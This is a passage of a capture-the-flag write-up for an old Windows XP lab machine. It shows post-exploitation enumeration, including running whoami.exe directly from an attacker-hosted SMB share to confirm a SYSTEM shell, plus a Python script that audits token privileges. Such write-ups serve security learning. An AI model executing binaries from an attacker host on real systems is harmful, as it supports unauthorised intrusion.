whoami.exe
Although I have gained a foothold on the target system, I have yet to find out which user I am running as, because the target system is extremely old.
The whoami.exe binary was not shipped with Windows XP by default.
c:\WINDOWS\system32> echo %USERNAME%
%USERNAME%
c:\WINDOWS\system32> set USERNAME
Environment variable USERNAME not defined
The environment variable wasn't even set.
c:\> dir "Documents and Settings"
dir "Documents and Settings"
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of c:\Documents and Settings

16/03/2017  09:07    <DIR>          .
16/03/2017  09:07    <DIR>          ..
16/03/2017  09:07    <DIR>          Administrator
16/03/2017  08:29    <DIR>          All Users
16/03/2017  08:33    <DIR>          john
               0 File(s)              0 bytes
               5 Dir(s)   6.325.542.912 bytes free
The c:\Documents and Settings directory is where user home directories are located in Windows XP.
There are home directories for the john and Administrator users.
c:\Documents and Settings> tree /F /A Administrator
tree /F /A Administrator
Folder PATH listing
Volume serial number is 00000072 54bf:723B
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR
+---Desktop
|       root.txt
|
+---Favorites
|   |   MSN.com.url
|   |   Radio Station Guide.url
|   |
|   \---Links
|           Customize Links.url
|           Free Hotmail.url
|           Windows Marketplace.url
|           Windows Media.url
|           Windows.url
|
+---My Documents
|   +---My Music
|   |       Sample Music.lnk
|   |
|   \---My Pictures
|           Sample Pictures.lnk
|
\---Start Menu
    \---Programs
        |   Internet Explorer.lnk
        |   Outlook Express.lnk
        |   Remote Assistance.lnk
        |   Windows Media Player.lnk
        |
        +---Accessories
        |   |   Address Book.lnk
        |   |   Command Prompt.lnk
        |   |   Notepad.lnk
        |   |   Program Compatibility Wizard.lnk
        |   |   Synchronize.lnk
        |   |   Tour Windows XP.lnk
        |   |   Windows Explorer.lnk
        |   |
        |   +---Accessibility
        |   |       Magnifier.lnk
        |   |       Narrator.lnk
        |   |       On-Screen Keyboard.lnk
        |   |       Utility Manager.lnk
        |   |
        |   \---Entertainment
        |           Windows Media Player.lnk
        |
        \---Startup
The fact that I am able to list the home directory of the Administrator user suggests that I am the Administrator user.
Confirmation
┌──(kali㉿kali)-[~/archive/htb/labs/legacy]
└─$ locate -i whoami.exe
/home/kali/.wine/drive_c/windows/system32/whoami.exe
/home/kali/.wine/drive_c/windows/syswow64/whoami.exe
/usr/lib/i386-linux-gnu/wine/i386-windows/whoami.exe
/usr/lib/x86_64-linux-gnu/wine/x86_64-windows/whoami.exe
/usr/share/windows-resources/binaries/whoami.exe
Kali comes with many Windows binaries for testing, and whoami.exe is one of them.
C:\WINDOWS\system32>\\10.10.14.2\smb\whoami.exe /all
[User] = "NT AUTHORITY\SYSTEM" S-1-5-18
[Group 1] = "BUILTIN\Administrators" S-1-5-32-544
[Group 2] = "Everyone" S-1-1-0
[Group 3] = "NT AUTHORITY\Authenticated Users" S-1-5-11
(X) SeTcbPrivilege = Act as part of the operating system
(X) SeCreateTokenPrivilege = Create a token object
(X) SeTakeOwnershipPrivilege = Take ownership of files or other objects
(X) SeCreatePagefilePrivilege = Create a pagefile
(X) SeLockMemoryPrivilege = Lock pages in memory
(X) SeAssignPrimaryTokenPrivilege = Replace a process level token
(X) SeIncreaseQuotaPrivilege = Adjust memory quotas for a process
(X) SeIncreaseBasePriorityPrivilege = Increase scheduling priority
(X) SeCreatePermanentPrivilege = Create permanent shared objects
(X) SeDebugPrivilege = Debug programs
(X) SeAuditPrivilege = Generate security audits
(X) SeSecurityPrivilege = Manage auditing and security log
(X) SeSystemEnvironmentPrivilege = Modify firmware environment values
(X) SeChangeNotifyPrivilege = Bypass traverse checking
(X) SeBackupPrivilege = Back up files and directories
(X) SeRestorePrivilege = Restore files and directories
(X) SeShutdownPrivilege = Shut down the system
(X) SeLoadDriverPrivilege = Load and unload device drivers
(X) SeProfileSingleProcessPrivilege = Profile single process
(X) SeSystemtimePrivilege = Change the system time
(X) SeUndockPrivilege = Remove computer from docking station
(X) SeManageVolumePrivilege = Perform volume maintenance tasks
(X) SeImpersonatePrivilege = Impersonate a client after authentication
(X) SeCreateGlobalPrivilege = Create global objects
Executing the whoami.exe binary confirms that I am SYSTEM.
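As an added example that is not part of the original writeup, the following Python parses the whoami.exe /all line format shown above, maps the account SID to its documented well-known principal (S-1-5-18 is LocalSystem) and lists the held privileges that a token audit should flag. The sample text is a constructed, abridged copy of the output above, and the set of flagged privileges is my own selection.

```python
import re
# Constructed sample: an abridged copy of the whoami.exe /all output shown above.
SAMPLE_OUTPUT = """\
[User] = "NT AUTHORITY\\SYSTEM" S-1-5-18
[Group 1] = "BUILTIN\\Administrators" S-1-5-32-544
(X) SeTcbPrivilege = Act as part of the operating system
(X) SeDebugPrivilege = Debug programs
(X) SeImpersonatePrivilege = Impersonate a client after authentication
(X) SeChangeNotifyPrivilege = Bypass traverse checking
"""

# Well-known SIDs documented by Microsoft for built-in principals.
WELL_KNOWN_SIDS = {"S-1-5-18": "LocalSystem", "S-1-5-19": "LocalService",
                   "S-1-5-20": "NetworkService", "S-1-5-32-544": "BUILTIN\\Administrators"}

# Privileges that on their own amount to full control of the host (my own selection).
HIGH_IMPACT_PRIVILEGES = {
    "SeTcbPrivilege", "SeDebugPrivilege", "SeImpersonatePrivilege", "SeCreateTokenPrivilege",
    "SeAssignPrimaryTokenPrivilege", "SeLoadDriverPrivilege", "SeTakeOwnershipPrivilege",
    "SeBackupPrivilege", "SeRestorePrivilege",
}

PRINCIPAL_RE = re.compile(r'^\[(User|Group \d+)\] = "([^"]+)" (S-1-[\d-]+)$')
PRIVILEGE_RE = re.compile(r'^\(X\) (Se\w+) = .+$')

def parse_whoami_all(text):
    """Return (user, groups, privileges) from the [User]/[Group n]/(X) line format."""
    user, groups, privs = None, [], []
    for line in text.splitlines():
        if m := PRINCIPAL_RE.match(line):
            entry = (m.group(2), m.group(3))  # (account name, SID)
            if m.group(1) == "User":
                user = entry
            else:
                groups.append(entry)
        elif m := PRIVILEGE_RE.match(line):
            privs.append(m.group(1))
    return user, groups, privs

def assess_token(text):
    user, groups, privs = parse_whoami_all(text)
    name, sid = user
    return {
        "user": name,
        "sid": sid,
        "well_known": WELL_KNOWN_SIDS.get(sid),  # "LocalSystem" means the shell is SYSTEM
        "is_local_admin": any(g_sid == "S-1-5-32-544" for _, g_sid in groups),
        "flagged_privileges": sorted(p for p in privs if p in HIGH_IMPACT_PRIVILEGES),
    }
```

Running assess_token over the full output above flags the SYSTEM token by its SID rather than by the display name, which matters when auditing tokens on hosts where whoami.exe only prints localized names.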
System Level Compromise